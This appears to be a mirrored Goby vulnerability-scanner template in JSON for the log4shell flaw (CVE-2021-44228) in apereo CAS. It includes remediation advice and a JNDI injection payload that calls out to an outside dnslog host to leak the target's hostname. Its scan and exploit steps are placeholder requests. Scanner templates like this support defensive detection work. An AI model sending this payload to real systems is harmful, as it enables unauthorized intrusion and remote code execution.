qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/apereo-CAS-log4shell-RCE-vu...

135 lines
4.4 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "apereo CAS log4shell RCE vulnerability (CVE-2021-44228)",
"Description": "<p>apereo CAS is an open source enterprise multilingual single sign-on solution for the Web.</p><p>apereo CAS has a log4shell RCE vulnerability. Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.</p>",
"Product": "apereo CAS",
"Homepage": "https://github.com/apereo/cas",
"DisclosureDate": "2021-12-22",
"Author": "keeeee",
"FofaQuery": "app=\"apereo-CAS\"",
"GobyQuery": "app=\"apereo-CAS\"",
"Level": "3",
"Impact": "<p>Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.</p>",
"Recommendation": "<p>The supplier has released a solution, please upgrade to the new version:<a href=\"https://apereo.github.io/2021/12/11/log4j-vuln/\" target=\"_blank\">https://apereo.github.io/2021/12/11/log4j-vuln/</a></p><p>1. Deploy a web application firewall to monitor database operations.</p><p>2.If not necessary, prohibit public network access to the system.</p> ",
"Translation": {
"CN": {
"Name": "apereo CAS log4shell 命令执行漏洞CVE-2021-44228",
"Product": "apereo CAS",
"VulType": [
"命令执行"
],
"Tags": [
"命令执行"
],
"Description": "<p>apereo CAS&nbsp;是一个开源的用于 Web 的企业多语言单点登录解决方案。</p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">apereo CAS 存在&nbsp;log4shell RCE 漏洞。<span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者可通过该漏洞在服务器端任意执行代码写入后门获取服务器权限进而控制整个web服务器。</span></span><br></p>",
"Impact": "<p>攻击者可通过该漏洞在服务器端任意执行代码写入后门获取服务器权限进而控制整个web服务器。<br></p>",
"Recommendation": "<p>⼚商已发布了漏洞方案,请及时关注: <a href=\"https://apereo.github.io/2021/12/11/log4j-vuln/\">https://apereo.github.io/2021/12/11/log4j-vuln/</a></p><p>1、通过防⽕墙等安全设备设置访问策略设置⽩名单访问。</p><p>2、如⾮必要禁⽌公⽹访问该系统。</p>"
}
},
"References": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228",
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"https://apereo.github.io/2021/12/11/log4j-vuln/"
],
"HasExp": true,
"ExpParams": [
{
"name": "dnslog",
"type": "input",
"value": "${jndi:ldap://${hostName}.xxx.dnslog.cn}"
}
],
"ExpTips": null,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
"CVE-2021-44228"
],
"CVSSScore": "10.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"CNNVD": [
"CNNVD-202112-799"
],
"CNVD": [
"CNVD-2021-95914"
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Is0day": false
}
Reference in New Issue View Git Blame Copy Permalink